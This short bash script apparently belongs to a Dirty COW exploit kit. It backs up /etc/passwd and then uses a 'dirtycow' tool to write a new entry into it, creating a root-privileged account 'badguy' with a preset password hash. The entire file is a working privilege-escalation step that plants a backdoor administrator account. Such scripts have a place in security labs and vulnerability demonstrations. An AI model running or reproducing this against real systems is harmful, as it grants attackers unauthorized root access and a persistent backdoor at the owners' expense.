#!/bin/bash
#
# Edit /etc/passwd to create a root account with credentials "badguy:badguy".

. "$(dirname "$0")/common.sh"

backup="$HOME/passwd"
cp /etc/passwd "$backup"
echoerr "Backed up /etc/passwd to $backup"

dirtycow -a -s "badguy:5/tk2PeameNik:0:0:root:/root:/bin/bash" /etc/passwd
